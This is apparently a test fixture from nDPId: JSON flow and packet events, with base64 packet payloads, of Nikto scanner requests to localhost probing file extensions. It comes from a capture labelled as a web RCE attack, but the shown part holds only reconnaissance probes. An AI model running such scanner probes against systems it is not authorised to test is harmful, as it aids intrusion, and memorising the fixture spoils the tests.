-00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 